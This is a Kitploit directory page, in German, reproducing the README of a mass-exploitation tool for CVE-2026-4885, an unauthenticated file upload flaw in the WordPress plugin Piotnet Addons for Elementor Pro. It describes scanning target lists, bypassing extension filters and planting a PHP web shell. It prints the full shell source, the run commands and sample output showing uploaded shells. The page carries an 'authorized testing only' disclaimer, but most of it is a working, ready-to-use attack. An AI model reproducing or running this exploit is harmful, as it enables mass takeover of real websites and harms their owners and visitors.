Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-4885 — Piotnet Addons for Elementor Pro <= 7.1.70 - Nicht authentifizierter beliebiger Datei-Upload über Formular-Datei-Upload | Kitploit
Tools/GitHubGitHub/jenderal92/cve-2026-4885
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed TeamingPayload-Entwicklung
GitHubjenderal92/cve-2026-4885

CVE-2026-4885

Piotnet Addons for Elementor Pro <= 7.1.70 - Nicht authentifizierter beliebiger Datei-Upload über Formular-Datei-Upload

Repository anzeigen
vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-4885 – Piotnet Addons für Elementor Pro Massen-Exploit

Nicht authentifiziertes beliebiges Datei-Upload, das zu Remote Code Execution (RCE) in Piotnet Addons für Elementor Pro ≤ 7.1.70 führt.

Dieses Tool ist für die Massenausnutzung konzipiert – gib ihm eine Liste von Zielen und es wird automatisch:

  • Plugin-Version erkennen (oder als verwundbar annehmen, wenn Assets gefunden werden)
  • Fortgeschrittene Aufklärung durchführen, um post_id, form_id und den korrekten Upload-Feldnamen zu extrahieren
  • Mehrere PHP-Erweiterungen (.phtml, .php3, .php4, .phps, .pht, .php2) ausprobieren, um schwache Filter zu umgehen
  • Eine GIF89a-Header PHP-Shell hochladen (integriert, keine externe Datei erforderlich)
  • Die hochgeladene Shell-URL über pafe_export_database leaken
  • Shell-Ausführung verifizieren (nach Logic_Internet-String suchen) und die URL in shells.txt speichern

⚠️ Haftungsausschluss
Dieses Tool dient nur zu Bildungs- und autorisierten Sicherheitstests.
Die unbefugte Nutzung gegen Systeme, die Ihnen nicht gehören, ist illegal.

Weitere Haftungsausschlüsse findest du auf dem Cover von Jenderal92. Du kannst sie HIER !!! überprüfen.


Funktionen

  • Python 2.7 kompatibel (funktioniert auch mit Python 3, wenn print/input angepasst werden)
  • Multithreaded – scanne und exploite bis zu 20 Ziele gleichzeitig
  • Intelligente Formularerkennung – parst Piotnet-spezifische HTML-Attribute (data-pafe-form-builder-field-name, data-elementor-id, usw.)
  • Keine externe Shell-Datei – das PHP-Payload ist im Skript eingebettet
  • Automatisches URL-Schema – fügt https:// hinzu, falls fehlend
  • Umfangreiche Pfadliste – enthält 22 häufig verwendete Formular-URLs (/contact, /apply, /quote, /book-appointment, …)
  • Leak-Muster – erfasst sowohl wp-content/uploads/piotnet-addons-for-elementor/ als auch direkte Root-Pfade

Anforderungen

  • Python 2.7 (oder Python 3 mit geringfügigen Änderungen)
  • requests-Bibliothek
root@kitploit:~
pip install requests

Installation

root@kitploit:~
git clone https://github.com/Jenderal92/CVE-2026-4885.git
cd CVE-2026-4885

Verwendung

  1. Vorbereiten einer Zieldatei

Erstelle eine Datei namens targets.txt (oder einen beliebigen Namen) mit einer URL pro Zeile:

root@kitploit:~
https://example1.com
example2.com
http://vulnerable-site.org
  1. Ausführen des Exploits
root@kitploit:~
python2 CVE-2026-4885.py targets.txt

Das Skript wird:

· Fortschritt für jedes Ziel anzeigen · Erfolgreiche Shell-URLs in shells.txt speichern

Beispielausgabe

root@kitploit:~
[*] Loaded built-in shell (598 bytes)
[*] scanning 25 pages...
[+] found form at https://target.com/contact | post_id=13 form_id=fa2c60e field=file
[*] post_id=13 form_id=fa2c60e field=file
[*] trying .phtml
[+] uploaded .phtml
[+] shell URL: https://target.com/wp-content/uploads/piotnet-addons-for-elementor/xxx-6a11e162a6099.phtml
[+] SHELL UPLOADED -> https://target.com/wp-content/uploads/piotnet-addons-for-elementor/xxx-6a11e162a6099.phtml

Kommandozeilenoptionen (im Skript anpassbar)

Du kannst diese ändern, indem du den Anfang des Skripts bearbeitest.


Shell-Payload

Die integrierte Shell ist:

root@kitploit:~
GIF89a;
<?php
echo 'Logic_Internet'.'<br>'.'Uname:'.php_uname().'<br>'.$cwd = getcwd();
Echo '<center>  <form method="post" target="_self" enctype="multipart/form-data">  <input type="file" size="20" name="uploads" /> <input type="submit" value="upload" />  </form>  </center>'.'<br>';
if (!empty ($_FILES['uploads'])) {
    move_uploaded_file($_FILES['uploads']['tmp_name'],$_FILES['uploads']['name']);
    Echo "<script>alert('upload Done');</script><b>Uploaded !!!</b><br>name : ".$_FILES['uploads']['name']."<br>size : ".$_FILES['uploads']['size']."<br>type : ".$_FILES['uploads']['type'];
}
?>

· Zeigt Serverinformationen, aktuelles Arbeitsverzeichnis und ein Datei-Upload-Formular an. · Kann durch jeden anderen PHP-Code ersetzt werden (ändere einfach SHELL_CODE im Skript).


Wie es funktioniert

  1. Versionserkennung · Durchsucht die Startseite nach ?ver= in Plugin-Assets. · Fällt auf die Überprüfung der Existenz bekannter CSS/JS-Dateien zurück.
  2. Aufklärung · Durchsucht häufig verwendete Formularseiten und alle internen Links auf der Startseite. · Extrahiert post_id, form_id und den korrekten Datei-Upload-Feldnamen aus Piotnet-spezifischen HTML-Attributen.
  3. Upload · Sendet eine multipart POST-Anfrage an wp-admin/admin-ajax.php?action=pafe_ajax_form_builder. · Verwendet ein JSON-Payload, das den Upload-Mechanismus des Plugins nachahmt. · Probiert alle Erweiterungen in EXT_LIST, bis eine erfolgreich ist.
  4. Leak · Fordert pafe_export_database an, das eine CSV mit der vollständigen URL der hochgeladenen Datei zurückgibt. · Parst die URL mit einem Regex-Muster, das xxx-{random}.ext entspricht.
  5. Verifizierung · Besucht die geleakte URL. · Überprüft das Vorhandensein des Strings Logic_Internet. · Speichert die URL bei Erfolg in shells.txt.

Fehlerbehebung

UnicodeEncodeError unter Windows

Das Skript enthält bereits eine safe_unicode()-Funktion, die nicht-ASCII-Zeichen behandelt. Wenn du weiterhin Fehler siehst, stelle sicher, dass dein Terminal UTF‑8 unterstützt:

root@kitploit:~
chcp 65001

Kein Formular gefunden / Alle Erweiterungen schlagen fehl

· Das Ziel ist möglicherweise gepatcht oder verwendet keine Piotnet Addons. · Versuche TIMEOUT oder MAX_THREADS zu erhöhen. · Überprüfe manuell, ob das Plugin tatsächlich installiert ist.

Leak schlägt fehl, aber Upload erfolgreich

· Der pafe_export_database-Endpunkt könnte deaktiviert oder geschützt sein. · Versuche, /wp-admin/admin-ajax.php?action=pafe_export_database manuell in einem Browser aufzurufen, um zu sehen, ob er zugänglich ist.


Rechtliche und ethische Nutzung

· Verwende dieses Tool nur auf Systemen, für die du eine schriftliche Erlaubnis zum Testen hast. · Der Autor ist nicht verantwortlich für Missbrauch oder verursachte Schäden. · Respektiere alle geltenden Gesetze.

Tool herunterladen
VariableBeschreibungStandardwert
TIMEOUTHTTP-Request-Timeout10 Sekunden
MAX_THREADSAnzahl gleichzeitiger Threads20
OUTPUT_FILEWo erfolgreiche Shell-URLs gespeichert werdenshells.txt
EXT_LISTZu probierende Dateierweiterungen.phtml, .php3, .php4, .phps, .pht, .php2